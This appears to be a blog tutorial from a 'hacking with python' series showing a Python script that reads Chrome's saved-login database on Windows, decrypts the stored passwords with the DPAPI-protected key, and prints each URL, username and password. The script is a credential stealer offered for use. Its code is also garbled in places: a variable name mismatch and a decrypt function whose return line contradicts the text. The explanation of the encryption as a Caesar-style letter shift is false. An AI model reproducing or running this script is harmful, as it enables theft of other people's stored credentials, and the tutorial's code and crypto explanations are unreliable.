How to extract Chrome Passwords using python/python3!

Hello everyone and welcome to another tutorial!

This is the 5th video from hacking with python series, in this episode we are going to take a look at how to make your own script that extracts chrome passwords and some details about each password.

So we are going to start off with installing some modules using pip.

pip3 install pycryptodome pypiwin32

Alright now open up your terminal and start off by typing pip install pypiwin32 crypto and hit enter.

Ok now that we have everything set up correctly let’s dive into some code!

Let's start off by importing the necessary modules!

After importing all the dependencies we need to create some functions.

Let's start by creating a function that takes as a parameter a date as chromedate format and

returns a date that is readable by humans.

def get_chrome_datetime(chromedate):    return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

Ok now we need a function that opens the file where every password is stored

Gets the encryption key so to do this we need to decode it and we will need base64 to do this.

Then remove the DPAPI string

def get_encryption_key():    local_state_path = os.path.join(os.environ[“USERPROFILE”],    “AppData”, “Local”, “Google”, “Chrome”,    “User Data”, “Local State”)    with open(local_state_path, “r”, encoding=”utf-8") as f:        local_state = f.read()        local_state = json.loads(local_state)        # decode the encryption key from Base64        gkey = base64.b64decode(local_state[“os_crypt”]               [“encrypted_key”])
         # remove DPAPI str         key = key[5:]    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

# return decrypted key that was originally encrypted

# using a session key derived from the current user’s login credentials

Ok let me now explain what this encryption key basically is:

So the passwords are stored and encrypted using the cipher encryption technique, which basically goes like this.

Let's say you want to encrypt the message:

Hello

What you would do is go and shift every letter by some number which is called an encryption key.

So let's set en_key to 1, then

  1. H becomes I
  2. E becomes F
  3. L becomes M

And so on, so we need to get the encryption key for our files before decrypting the passwords.

Now we need to find all passwords stored and return them as a string readable by humans so we need to actually decrypt them before returning them.

def decrypt_password(password, key):
iv = password[3:15] password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])

To do this we need to get the initialization vector, lets go ahead and do this by typing ….

This is something you don’t need to worry about as it is something you will do by default.

Ok now with this info we can generate what’s called a cipher, this is basically something the alphabet shifted by the en_key for the decrypt function.

Alright now we will finally return cipher.decrypt(password)[:-16].decode()

In case this returns you an error, this is because you need to be in windows to do this.

And last but not least we need to have a main function that will use all of those functions we just created!

def main():    key = get_encryption_key()    //Ok now we need the en_key so lets store this in a key variable    db_path = os.path.join(os.environ[“USERPROFILE”], “AppData”,     “Local”,    “Google”, “Chrome”, “User Data”, “default”, “Login Data”    filename = “ChromeData.db”    shutil.copyfile(db_path, filename)

Let's store the path to the db and copy the file to another location because the database will be locked if chrome is currently running.

# connect to the database

db = sqlite3.connect(filename)cursor = db.cursor()

Now we need to connect using this filename

And create what is called a cursor that will help us jump around the database.

# `logins` table has the data we need

cursor.execute(“select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created”)

So, quick reminder databases have rows and columns with different information stored in each one of them, now we need to say to our program hey I want only some rows and columns that have in them stored the login information we need!

Alright, now that we have everything set up let's go through this table this is how it is called, and let's grab some info we need. This is also called iterate, just good to keep in mind.

for row in cursor.fetchall():    origin_url = row[0]    action_url = row[1]    username = row[2]    password = decrypt_password(row[3], key)    date_created = row[4]    date_last_used = row[5]

Ok so we want it from the row in index 0, but remember that we put 0 because we start from 0 in programming and those rows have the information we want to be stored in them!

The password will have to be decrypted with the function we made.

if username or password:    print(f”Origin URL: {origin_url}”)    print(f”Action URL: {action_url}”)    print(f”Username: {username}”)    print(f”Password: {password}”)else:    continue

Ok, let's check if there is any information stored in chrome otherwise we cant print anything.

if date_created != 86400000000 and date_created:    print(f”Creation date: {str(get_chrome_datetime(date_created))}”)    if date_last_used != 86400000000 and date_last_used:        print(f”Last Used: {str(get_chrome_datetime(date_last_used))}”)        print(“=”*50)

And in the same way, let's provide some more information!

cursor.close()db.close()

Then we need to actually close the cursor and the db, just what we would do in every file.

try:    # try to remove the copied db file    os.remove(filename)except:    pass

And lastly, let's remove the copied file so we don’t mess up with our space!

I hope you enjoyed the tutorial and if you did make sure to upvote my tutorial and check out the great resources our community provides!

Full code here: https://github.com/SpyrosD3v25/Extract-Chrome-Passwords/blob/main/extract.py

Discord: https://discord.gg/ButwDC6H (We have a channel with around 100 links and pdfs for cybersecurity, that covers almost every aspect of cybersecurity and programming in general)

Youtube: https://www.youtube.com/watch?v=r3G5U3t1IDI A series with lots of videos about hacking with python3!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store